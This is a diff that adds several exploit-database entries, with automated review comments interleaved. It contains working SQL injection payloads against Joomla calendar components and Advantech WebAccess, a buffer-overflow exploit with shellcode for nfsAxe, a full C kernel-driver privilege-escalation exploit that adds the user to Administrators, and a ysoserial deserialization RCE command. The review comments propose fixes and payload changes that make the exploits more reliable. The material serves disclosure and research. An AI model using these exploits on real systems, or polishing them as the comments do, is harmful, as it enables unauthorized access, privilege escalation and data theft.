diff --git a/exploits/php/webapps/43931.txt b/exploits/php/webapps/43931.txt
new file mode 100644
index 000000000..14ca1e1ee
--- /dev/null
+++ b/exploits/php/webapps/43931.txt
@@ -0,0 +1,24 @@
+# # # # #
+# Exploit Title: Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal
+# Dork: N/A
+# Date: 30.01.2018
+# Vendor Homepage: http://www.joomlacalendars.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/picture-calendar-for-joomla/
+# Version: 3.1.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6397
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# Directory Traversal...
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/list.php?folder=[DIRECTORY]
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43932.txt b/exploits/php/webapps/43932.txt
new file mode 100644
index 000000000..a3c842e44
--- /dev/null
+++ b/exploits/php/webapps/43932.txt
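Review bot: The proof of concept `http://localhost/[PATH]/list.php?folder=[DIRECTORY]` never shows a traversal value or what the server returns, so a reader cannot tell whether this is a directory listing, a file read, or merely an unfiltered parameter. I would expand the `# Directory Traversal...` line into a sentence naming the effect and add a concrete request, e.g. `# 1) http://localhost/[PATH]/list.php?folder=../../../../` followed by `# -> response enumerates the traversed directory (confirm on a test install)`. The location of `list.php` inside the Joomla install is also left to the reader as `[PATH]`; since `list.php` is not a Joomla entry point the component-relative path should be named.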
@@ -0,0 +1,43 @@ +# # # # # +# Exploit Title: Joomla! Component CP Event Calendar 3.0.1 - SQL Injection +# Dork: N/A +# Date: 30.01.2018 +# Vendor Homepage: http://www.joomlacalendars.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/cp-event-calendar/ +# Version: 3.0.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-6398 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/index.php?option=com_cpeventcalendar&task=load&id=[SQL] +# +# %2d%31%20%20%2f%2a%21%30%36%36%36%36%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%36%36%36%36%53%45%4c%45%43%54%2a%2f%20CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d +# +# Parameter: id (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: option=com_cpeventcalendar&task=load&id=1 AND 6741=6741 +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: option=com_cpeventcalendar&task=load&id=1 AND (SELECT 7531 FROM(SELECT COUNT(*),CONCAT(0x716a707671,(SELECT (ELT(7531=7531,1))),0x717a6a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) +# +# Type: AND/OR time-based blind +# Title: MySQL <= 5.0.11 AND time-based blind (heavy query - comment) +# Payload: option=com_cpeventcalendar&task=load&id=1 AND 3954=BENCHMARK(5000000,MD5(0x4573626a))# +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 7 columns +# Payload: option=com_cpeventcalendar&task=load&id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a707671,0x4a61716b6d59557a4f5a496f7676584d57444e514d4d78626d42546e786d79747350424271687555,0x717a6a7a71),NULL,NULL,NULL-- cJFi +# +# # # # # \ No newline at end of file 
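Review bot: The hand-written UNION payload under `# 1)` is given only in percent-encoded form, which hides what is actually sent; decoded it is `-1 /*!06666UNION*/ /*!06666SELECT*/ CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2,3,4,5,6,7-- -`, where `0x203a20` is the literal ` : ` separator and the `/*!06666...*/` version-comment wrapping is a filter-evasion trick rather than something the bug needs. I would add that decoded line as a comment beneath the request so it can be cross-checked against the sqlmap section (`task=load&id=`, 7 columns). The entry also does not say which file in the component interpolates `id` into the query; naming it if known, and noting that an `(int)` cast or database-layer quoting closes the hole, is what a maintainer or defender reading this would want.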
diff --git a/exploits/php/webapps/43933.txt b/exploits/php/webapps/43933.txt
new file mode 100644
index 000000000..833fe8d2c
--- /dev/null
+++ b/exploits/php/webapps/43933.txt
@@ -0,0 +1,41 @@ +# # # # # +# Exploit Title: Joomla! Component Visual Calendar 3.1.3 - SQL Injection +# Dork: N/A +# Date: 30.01.2018 +# Vendor Homepage: http://www.joomlacalendars.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/visual-calendar/ +# Version: 3.1.3 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-6395 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/index.php?option=com_visualcalendar&view=load&id=[SQL] +# +# -1%20%20/*!06666UNION*/%20/*!06666SELECT*/%20(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)%2c0x32%2c0x33%2c0x34%2c0x35%2c0x36%2d%2d%20%2d +# +# -1%20%20/*!06666UNION*/%20/*!06666SELECT*/%201%2c0x32%2c(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)%2c0x34%2c0x35%2c0x36%2d%2d%20%2d +# +# Parameter: id (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: r=0.31729071866720915&option=com_visualcalendar&view=load&id=1 AND 2616=2616 +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: r=0.31729071866720915&option=com_visualcalendar&view=load&id=1 AND SLEEP(5) +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 6 columns +# Payload: r=0.31729071866720915&option=com_visualcalendar&view=load&id=1 UNION ALL SELECT 
CONCAT(0x716a627a71,0x586a6c7676787a6f684c73745863744b7955784a47534d58797158564a53716d6b57434f6141536c,0x71786b6a71),NULL,NULL,NULL,NULL,NULL-- QpYd
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/windows/dos/43930.py b/exploits/windows/dos/43930.py
new file mode 100755
index 000000000..6cc25a7ae
--- /dev/null
+++ b/exploits/windows/dos/43930.py
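Review bot: The two manual payloads under `# 1)` differ only in which UNION column carries the subquery (column 1 in the first, column 3 in the second), i.e. which column the page reflects, and that should be said in a comment so the reader does not have to diff two long encoded strings. Decoded, the subquery walks `INFORMATION_SCHEMA.TABLES` skipping `TABLE_SCHEMA` equal to `0x696e666f726d6174696f6e5f736368656d61` (`information_schema`) and concatenates numbered table names separated by `0x3c62723e` (`<br>`), which is worth one explanatory line, e.g. `# dumps every non-system table name, numbered, one per <br>`. The `r=0.31729071866720915` parameter in the sqlmap payloads looks like a random cache-buster captured from the page rather than part of the injection; a note to that effect avoids readers treating it as required.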
@@ -0,0 +1,70 @@ +#!/usr/bin/python +######################################################################################################## +# Exploit Author: Miguel Mendez Z +# Exploit Title: LabF nfsAxe v3.7 - TFTP "Input Directory" Local Buffer Overflow +# Date: 29-01-2018 +# Software: LabF nfsAxe +# Version: v3.7 +# Vendor Homepage: http://www.labf.com +# Software Link: http://www.labf.com/download/nfsaxe.exe +# Tested on: Windows 7 x86 +######################################################################################################## + +import struct + +ropAlignEsp = ( +"\x83\xEC\x58" #SUB ESP,58 +"\x83\xEC\x58" #SUB ESP,58 +"\x83\xEC\x58" #SUB ESP,58 +"\x83\xEC\x58" #SUB ESP,58 +"\x83\xEC\x10" #SUB ESP,10 +"\xFF\xE4" #JMP ESP +) + +scode = "\xB9\xEF\xEE\xEE\xEE" #MOV ECX,EEEEEEEF +scode += "\x81\xC1\x11\x11\x11\x11" #ADD ECX,11111111 +scode += "\x51" #PUSH ECX +scode += "\x68\x31\x30\x73\x21" #PUSH 31307321 +scode += "\x68\x73\x31\x6b\x72" #PUSH 73316b72 +scode += "\x68\x5f\x62\x79\x5f" #PUSH 5f62795f +scode += "\x68\x70\x77\x6e\x64" #PUSH 70776e64 +scode += "\x68\x42\x30\x66\x5f" #PUSH 4230665f +scode += "\x8B\xD4" #MOV EDX,ESP +scode += "\x48" #DEC EAX +scode += "\x50" #PUSH EAX +scode += "\x52" #PUSH EDX +scode += "\x52" #PUSH EDX +scode += "\x50" #PUSH EAX +scode += "\xBA\x11\xEA\x1A\x76" #MOV EDX,USER32.MessageBoxA() (Change) +scode += "\xFF\xD2" #CALL EDX +#-------------- +scode += "\x33\xD2" #XOR EDX,EDX +scode += "\xB9\xEF\xEE\xEE\xEE" #MOV ECX,EEEEEEEF +scode += "\x81\xC1\x11\x11\x11\x11" #ADD ECX,11111111 +scode += "\x51" #PUSH ECX +scode += "\x68\x63\x61\x6c\x63" #PUSH 0x63616c63 +scode += "\x8B\xD4" #MOV EDX,ESP +scode += "\x52" #PUSH EDX +scode += "\x33\xD2" #XOR EDX,EDX +scode += "\xBA\x6F\xB1\x0F\x76" #MOV EDX,msvcrt.system - 0x760fb16f (Change) +scode += "\xFF\xD2" #CALL EDX +#-------------- +scode += "\x50" #PUSH EAX +scode += "\xB8\xE2\xBB\xB5\x75" #MOV EAX,kernel32.ExitProcess() (Change) +scode += "\xFF\xD0" #CALL EAX + +offset = 
"Host: "+scode+"A"*(1000-len(scode))+"\n" +offset += "File(s): "+"B"*33 +offset += struct.pack(" +#include +#include + +#pragma comment(lib,"advapi32.lib") + +#define MSIEXECKEY "MACHINE\\SYSTEM\\CurrentControlSet\\services\\msiserver" + +#define SystemHandleInformation 16 +#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L) + + +typedef unsigned __int64 QWORD; + + +typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO +{ + ULONG ProcessId; + UCHAR ObjectTypeNumber; + UCHAR Flags; + USHORT Handle; + QWORD Object; + ACCESS_MASK GrantedAccess; +} SYSTEM_HANDLE, *PSYSTEM_HANDLE; + + +typedef struct _SYSTEM_HANDLE_INFORMATION +{ + ULONG NumberOfHandles; + SYSTEM_HANDLE Handles[1]; +} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; + + +typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( + ULONG SystemInformationClass, + PVOID SystemInformation, + ULONG SystemInformationLength, + PULONG ReturnLength); + + + + +QWORD TokenAddressCurrentProcess(HANDLE hProcess, DWORD MyProcessID) +{ + _NtQuerySystemInformation NtQuerySystemInformation; + PSYSTEM_HANDLE_INFORMATION pSysHandleInfo; + ULONG i; + PSYSTEM_HANDLE pHandle; + QWORD TokenAddress = 0; + DWORD nSize = 4096; + DWORD nReturn; + BOOL tProcess; + HANDLE hToken; + + + if ((tProcess = OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) == FALSE) + { + printf("\n[-] OpenProcessToken() failed (%d)\n", GetLastError()); + return -1; + } + + NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); + + if (!NtQuerySystemInformation) + { + printf("[-] Unable to resolve NtQuerySystemInformation\n\n"); + return -1; + } + + do + { + nSize += 4096; + pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) HeapAlloc(GetProcessHeap(), 0, nSize); + } while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH); + + printf("\n[i] Current process id %d and token handle value %u", MyProcessID, hToken); + + for 
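Review bot: The three API addresses in the shellcode (`MOV EDX,USER32.MessageBoxA() (Change)`, `MOV EDX,msvcrt.system`, `MOV EAX,kernel32.ExitProcess()`) are absolute and only valid for the boot on which they were recorded, since Windows 7 rebases system DLLs per boot; the `(Change)` markers are not enough guidance. I would add above `scode`: `# user32/msvcrt/kernel32 bases change per boot on Win7 (ASLR); read these three addresses on the target (debugger/arwin) before generating the file` or resolve them at run time instead. The `MOV ECX,EEEEEEEF` / `ADD ECX,11111111` pairs build a zero terminator without emitting a null byte and deserve a one-line comment, as the overflow presumably travels through a NUL-terminated string copy. The tail of this hunk (the `struct.pack(` argument and the output file write) is not visible in this view, so the return address and file name could not be reviewed.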
(i = 0; i < pSysHandleInfo->NumberOfHandles; i++) + { + + if (pSysHandleInfo->Handles[i].ProcessId == MyProcessID && pSysHandleInfo->Handles[i].Handle == hToken) + { + TokenAddress = pSysHandleInfo->Handles[i].Object; + } + } + + HeapFree(GetProcessHeap(), 0, pSysHandleInfo); + return TokenAddress; +} + + + +int TakeOwnership() +{ + HANDLE token; + PTOKEN_USER user = NULL; + PACL pACL = NULL; + EXPLICIT_ACCESS ea; + DWORD dwLengthNeeded; + + + + if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token)) + { + printf("\n[-] OpenProcessToken failed %d\n\n", GetLastError()); + ExitProcess(1); + } + printf("\n[+] OpenProcessToken successful"); + + if (!GetTokenInformation(token, TokenUser, NULL, 0, &dwLengthNeeded) && GetLastError() != ERROR_INSUFFICIENT_BUFFER) + { + printf("\n[-] Failed to initialize GetTokenInformation %d\n\n", GetLastError()); + ExitProcess(1); + } + + user = (PTOKEN_USER)LocalAlloc(0, dwLengthNeeded); + + if (!GetTokenInformation(token, TokenUser, user, dwLengthNeeded, &dwLengthNeeded)) + { + printf("\n[-] GetTokenInformation failed %d\n\n", GetLastError()); + ExitProcess(1); + } + + ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); + +// build DACL + + ea.grfAccessPermissions = KEY_ALL_ACCESS; + ea.grfAccessMode = GRANT_ACCESS; + ea.grfInheritance = SUB_CONTAINERS_AND_OBJECTS_INHERIT; + ea.Trustee.TrusteeForm = TRUSTEE_IS_SID; + ea.Trustee.TrusteeType = TRUSTEE_IS_USER; + ea.Trustee.ptstrName = (LPTSTR)user->User.Sid; + + if (SetEntriesInAcl(1, &ea, NULL, &pACL) != ERROR_SUCCESS) + { + printf("\n[-] SetEntriesInAcl failure\n\n"); + ExitProcess(1); + } + printf("\n[+] SetEntriesInAcl successful"); + +// Take ownership + + if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, OWNER_SECURITY_INFORMATION, user->User.Sid, NULL, NULL, NULL) != ERROR_SUCCESS) + { + printf("\n[-] Failed to obtain the object's ownership %d\n\n", GetLastError()); + ExitProcess(1); + } + printf("\n[+] Ownership '%s' successful", MSIEXECKEY); + +// Modify DACL + + if 
(SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, pACL, NULL) != ERROR_SUCCESS) + { + printf("\n[-] Failed to modify the object's DACL %d\n\n", GetLastError()); + ExitProcess(1); + } + printf("\n[+] Object's DACL successfully modified"); + + LocalFree(pACL); + CloseHandle(token); + + return 0; +} + + + +int RestorePermissions() +{ + PACL pOldDACL = NULL; + PSID pSIDAdmin = NULL; + SID_IDENTIFIER_AUTHORITY SIDAuthNT = SECURITY_NT_AUTHORITY; + + + + printf("\n[*] Restoring all permissions and value"); + +// Restore registry value + + WriteToRegistry("%systemroot%\\system32\\msiexec.exe /V"); + +// Sid for the BUILTIN\Administrators group + + if (!AllocateAndInitializeSid(&SIDAuthNT, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &pSIDAdmin)) + { + printf("\nAllocateAndInitializeSid failed %d\n\n", GetLastError()); + ExitProcess(1); + } + +// Restore key ownership + + if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, OWNER_SECURITY_INFORMATION, pSIDAdmin, NULL, NULL, NULL) != ERROR_SUCCESS) + { + printf("\n[-] Failed to restore the object's ownership %d\n\n", GetLastError()); + ExitProcess(1); + } + printf("\n[+] Object's ownership successfully restored"); + +// Take copy of parent key + + if (GetNamedSecurityInfo("MACHINE\\SYSTEM\\CurrentControlSet\\Services", SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS) + { + printf("\n[-] Failed to copy parent key object's DACL %d\n\n", GetLastError()); + ExitProcess(1); + } + printf("\n[+] Parent key object's DACL successfully saved"); + +// Restore key permissions + + if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION | UNPROTECTED_DACL_SECURITY_INFORMATION, NULL, NULL, pOldDACL, NULL) != ERROR_SUCCESS) + { + printf("\n[-] Failed to restore the object's DACL %d\n\n", GetLastError()); + ExitProcess(1); + } + printf("\n[+] Object's DACL successfully restored"); + + 
FreeSid(pSIDAdmin); + + return 0; +} + + + +int WriteToRegistry(char command[]) +{ + HKEY hkeyhandle; + + if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\services\\msiserver", 0, KEY_WRITE, &hkeyhandle) != ERROR_SUCCESS) + { + printf("\n[-] Registry key failed to open %d\n\n", GetLastError()); + ExitProcess(1); + } + + if (RegSetValueEx(hkeyhandle, "ImagePath", 0, REG_EXPAND_SZ, (LPBYTE) command, strlen(command)) != ERROR_SUCCESS) + { + printf("\n[-] Registry value failed to write %d\n\n", GetLastError()); + ExitProcess(1); + } + + printf("\n[+] Registry key opened and value modified"); + + RegCloseKey(hkeyhandle); + + return 0; +} + + + +int TriggerCommand() +{ + STARTUPINFO si; + PROCESS_INFORMATION pi; + + + ZeroMemory(&si, sizeof(si)); + ZeroMemory(&pi, sizeof(pi)); + si.cb = sizeof(si); + + if (!CreateProcess(NULL, "c:\\windows\\system32\\msiexec.exe /i poc.msi /quiet", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) + { + printf("\n[-] CreateProcess failed %d", GetLastError()); + ExitProcess(1); + } + printf("\n[+] c:\\windows\\system32\\msiexec.exe launched"); + printf("\n[i] Account should now be in the local administrators group"); + + CloseHandle(pi.hThread); + CloseHandle(pi.hProcess); + + return 0; +} + + + +int main(int argc, char *argv[]) +{ + QWORD TokenAddressTarget; + QWORD SepPrivilegesOffset = 0x40; + QWORD TokenAddress; + HANDLE hDevice; + char devhandle[MAX_PATH]; + DWORD dwRetBytes = 0; + QWORD inbuffer1[3] = {0}; + QWORD inbuffer2[3] = {0}; + QWORD ptrbuffer[1] = {0}; // QWORD4 - Has to be 0 for arbitrary write value to be 0xfffffffe + DWORD currentusersize; + char currentuser[100]; + char netcommand[MAX_PATH]; + + + + printf("-------------------------------------------------------------------------------\n"); + printf(" System Shield AntiVirus & AntiSpyware (amp.sys) Arbitrary Write EoP Exploit \n"); + printf(" Tested on 64bit Windows 7 / Windows 10 (1709) \n"); + 
printf("-------------------------------------------------------------------------------\n"); + + TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId()); + printf("\n[i] Address of current process token 0x%p", TokenAddress); + + TokenAddressTarget = TokenAddress + SepPrivilegesOffset; + printf("\n[i] Address of _SEP_TOKEN_PRIVILEGES 0x%p will be overwritten", TokenAddressTarget); + + inbuffer1[0] = 0x8; // QWORD1 - Cannot be more than 8. Also different values (<9) calculates to different sub calls + inbuffer1[1] = ptrbuffer; // QWORD2 - Address used for read and write + inbuffer1[2] = TokenAddressTarget+1; // QWORD3 - Arbitrary write address !!! + + inbuffer2[0] = 0x8; + inbuffer2[1] = ptrbuffer; + inbuffer2[2] = TokenAddressTarget+9; + + sprintf(devhandle, "\\\\.\\%s", "amp"); + + hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); + + if(hDevice == INVALID_HANDLE_VALUE) + { + printf("\n[-] Open %s device failed\n\n", devhandle); + return -1; + } + else + { + printf("\n[+] Open %s device successful", devhandle); + } + + printf("\n[~] Press any key to continue . . 
.\n"); + getch(); + + DeviceIoControl(hDevice, 0x00226003, inbuffer1, sizeof(inbuffer1), NULL, 0, &dwRetBytes, NULL); + DeviceIoControl(hDevice, 0x00226003, inbuffer2, sizeof(inbuffer2), NULL, 0, &dwRetBytes, NULL); + + printf("[+] Overwritten _SEP_TOKEN_PRIVILEGES bits\n"); + CloseHandle(hDevice); + + currentusersize = sizeof(currentuser); + + if (!GetUserName(currentuser, ¤tusersize)) + { + printf("\n[-] Failed to obtain current username: %d\n\n", GetLastError()); + return -1; + } + + printf("[*] Adding current user '%s' account to the local administrators group", currentuser); + + sprintf(netcommand, "net localgroup Administrators %s /add", currentuser); + + TakeOwnership(); + WriteToRegistry(netcommand); + TriggerCommand(); + Sleep(1000); + RestorePermissions(); + printf("\n\n"); + + return 0; +} \ No newline at end of file diff --git a/exploits/windows/remote/43927.txt b/exploits/windows/remote/43927.txt new file mode 100644 index 000000000..33139ed26 --- /dev/null +++ b/exploits/windows/remote/43927.txt @@ -0,0 +1,13 @@ +# Exploit Title: HPE iMC 7.3 Java RMI Registry Deserialization RCE Vulnerability +# Date: 01-28-2018 +# Exploit Author: Chris Lyne (@lynerc) +# Vendor Homepage: www.hpe.com +# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19068&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber= +# Version: iMC PLAT v7.3 (E0504) Standard +# Tested on: Windows Server 2008 R2 Enterprise 64-bit +# CVE : CVE-2017-5792 +# See Also: http://zerodayinitiative.com/advisories/ZDI-18-137/ + +# note that this PoC will launch calc.exe + +$ java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.1.100 21195 CommonsBeanutils1 calc.exe \ No newline at end of file diff --git a/exploits/windows/webapps/43928.py b/exploits/windows/webapps/43928.py new file mode 100755 index 000000000..9a157b422 --- /dev/null +++ b/exploits/windows/webapps/43928.py 
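Review bot: `main` uses the value returned by `TokenAddressCurrentProcess` as the kernel write target without checking it: that function returns `0` when the handle is not found in the table and `-1` (as `QWORD`, `0xFFFFFFFFFFFFFFFF`) on API failure, and either value goes straight into `inbuffer1[2] = TokenAddressTarget+1` and the `DeviceIoControl` calls, so the failure mode is a bogus kernel write and a bugcheck rather than a clean exit. Two smaller defects in the same file: `WriteToRegistry` passes `strlen(command)` to `RegSetValueEx` for a `REG_EXPAND_SZ`, whereas the API requires the terminating NUL to be counted (`strlen(command) + 1`), and `RestorePermissions` calls `WriteToRegistry` before its definition, relying on an implicit declaration that a prototype near the top removes. `RestorePermissions` also passes `NULL` as the `ppSecurityDescriptor` argument of `GetNamedSecurityInfo` while requesting `ppDacl`; the documented contract requires a non-NULL descriptor pointer in that case (freed afterwards with `LocalFree`), so if the call rejects it the cleanup aborts after the escalation has already happened — worth confirming on the tested builds. `TokenAddressCurrentProcess` additionally never closes `hToken` and drops each too-small `HeapAlloc` buffer without freeing it on `STATUS_INFO_LENGTH_MISMATCH`, minor for a one-shot PoC. The diff header and `#include` lines for this file are not visible in this view.
```c
int WriteToRegistry(char command[]);   /* defined below; RestorePermissions() calls it first */

/* … unchanged: TokenAddressCurrentProcess, TakeOwnership, RestorePermissions … */

    /* REG_EXPAND_SZ: cbData must include the terminating NUL */
    if (RegSetValueEx(hkeyhandle, "ImagePath", 0, REG_EXPAND_SZ, (LPBYTE) command, strlen(command) + 1) != ERROR_SUCCESS)

/* … unchanged: rest of WriteToRegistry, TriggerCommand … */

    TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId());
    if (TokenAddress == 0 || TokenAddress == (QWORD)-1)
    {
        printf("\n[-] Could not locate the token object in the handle table; aborting before the kernel write\n\n");
        return -1;
    }
    printf("\n[i] Address of current process token 0x%p", TokenAddress);
```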
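Review bot: The line `# note that this PoC will launch calc.exe` undersells a verification problem: on Windows Server 2008 R2 the iMC service most likely runs under a service account in a non-interactive session, so `calc.exe` starts invisibly and the tester cannot distinguish success from failure. I would change the payload command to something with an observable side effect, e.g. `cmd.exe /c echo imc-deser > C:\Windows\Temp\poc.txt`, and say why in the note. The entry should also state why `CommonsBeanutils1` is the gadget used (presumably the matching commons-beanutils jar is on the iMC classpath — confirm) and that JEP 290 registry filtering in current JDKs, or restricting access to TCP 21195, is the defensive counterpart.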
@@ -0,0 +1,98 @@ +#!/usr/bin/python2.7 + +# Exploit Title: Advantech WebAccess BWSCADARest Login Method SQL Injection Authentication Bypass Vulnerability +# Date: 01-13-2018 +# Exploit Author: Chris Lyne (@lynerc) +# Vendor Homepage: www.advantech.com +# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe +# Version: Advantech WebAccess 8.0-2015.08.16 +# Tested on: Windows Server 2008 R2 Enterprise 64-bit +# CVE : CVE-2017-16716 +# See Also: http://zerodayinitiative.com/advisories/ZDI-18-065/ + +# Notes: +# +# There are two service interfaces: +# 1) SOAP +# 2) REST +# +# This PoC targets REST +# +# The web services did not work out of the box, and a new website/app was created in IIS for testing. +# This issue was potentially due to the fact that testing was completed against a trial version. +# PoC may need slight tweaks depending on configuration of the web service. +# +# Original vulnerability was reported for more recent software version. +# +# This WebAccessAuthBypass class can be imported :-) + +import sys, requests +from xml.etree import ElementTree + +class WebAccessAuthBypass: + def __init__(self, ip, port): + self.ip = ip + self.port = port + self.base_url = "http://%s:%s/BWMobileService/BWScadaRest.svc/" % (ip, port) + + def convert_entities(self, s): + return s.replace('>', '>').replace('<', '<') # convert html entities in response, for parsing + + def get_project_list(self): + print 'Getting list of projects...' + res = requests.get(self.base_url) + projects = list() + if res.status_code != 200: + print 'Bad HTTP response...' + else: + if 'PROJECT' not in res.text: + print 'No projects listed by service.' 
+ else: + s = self.convert_entities(res.text) + xml = ElementTree.fromstring(s) + for project_list in xml: + for project in project_list: + name = project.get('NAME') + if name is not None: + projects.append(name) + if len(projects) > 0: + print 'Found the following projects: ' + str(projects) + return projects + else: + return None + + # returns a token + def login(self, project): + # SQL Injection into the user parameter + url = self.base_url + "Login/" + project + "/notadmin'%20or%20'x'%3D'x/nopass" # notadmin' or 'x'='x + res = requests.get(url) + token = None + if res.status_code != 200: + print 'Bad HTTP response...' + else: + if 'OK TOKEN' not in res.text: + print 'No token returned by service.' + else: + s = self.convert_entities(res.text) + xml = ElementTree.fromstring(s) + if len(xml) > 0: + token = xml[0].get('TOKEN') + return token + + # token returned can be used for more transactions + def get_token(self): + project_list = self.get_project_list() + project = project_list[0] # might as well pick the first project + token = self.login(project_list[0]) + return token + +if __name__ == "__main__": + ip = 'targetip' + port = 'port#' + bypass = WebAccessAuthBypass(ip, port) + token = bypass.get_token() + + if token is not None: + print 'Successfully got an authentication token: ' + token + else: + print 'Unsuccessful.' \ No newline at end of file diff --git a/exploits/windows/webapps/43934.py b/exploits/windows/webapps/43934.py new file mode 100755 index 000000000..ad99167db --- /dev/null +++ b/exploits/windows/webapps/43934.py 
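Review bot: `get_token` indexes `project_list[0]` without checking the result of `get_project_list`, which returns `None` on a non-200 response or when no `PROJECT` element is found, so that failure path raises `TypeError` instead of printing `Unsuccessful.`; a guard `if not project_list: return None` before the index fixes it (and the local `project = project_list[0]` is assigned but never used). `login` embeds the raw project name in the URL path; a name containing `/`, spaces or `'` would need `urllib.quote` (Python 2 here), even though the injection string itself is already encoded. In this rendering `convert_entities` reads as a no-op (`'>'` replaced by `'>'`), presumably `&gt;`/`&lt;` lost to HTML, so the committed file should be checked for the literal entity names.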
@@ -0,0 +1,166 @@ +# Exploit Title: BMC BladeLogic RSCD agent get Windows users +# Filename: BMC_winUsers.py +# Github: https://github.com/bao7uo/bmc_bladelogic +# Date: 2018-01-27 +# Exploit Author: Paul Taylor / Foregenix Ltd +# Website: http://www.foregenix.com/blog +# Version: BMC RSCD agent 8.3.00.64 +# CVE: CVE-2016-5063 +# Vendor Advisory: https://docs.bmc.com/docs/ServerAutomation/87/release-notes-and-notices/flashes/notification-of-windows-rscd-agent-vulnerability-in-bmc-server-automation-cve-2016-5063 +# Tested on: 8.3.00.64 + +#!/usr/bin/python2 + +# Retrieving Windows system users with BMC BladeLogic RSCD agent +# Tested against v8.3.00.64 (Windows version) +# CVE-2016-5063 + +# Author: Paul Taylor / Foregenix Ltd +# github.com/bao7uo/bmc_bladelogic +# www.foregenix.com/blog + +# Credits: +# Converted to work against Windows version +# from the Linux BMC getUsers exploit by ERNW + +import socket +import ssl +import sys +import requests +import argparse +import xml.etree.ElementTree as ET +import xml.dom.minidom +import httplib +from requests.packages.urllib3 import PoolManager +from requests.packages.urllib3.connection import HTTPConnection +from requests.packages.urllib3.connectionpool import HTTPConnectionPool +from requests.adapters import HTTPAdapter + + +class MyHTTPConnection(HTTPConnection): + def __init__(self, unix_socket_url, timeout=60): + HTTPConnection.__init__(self, HOST, timeout=timeout) + 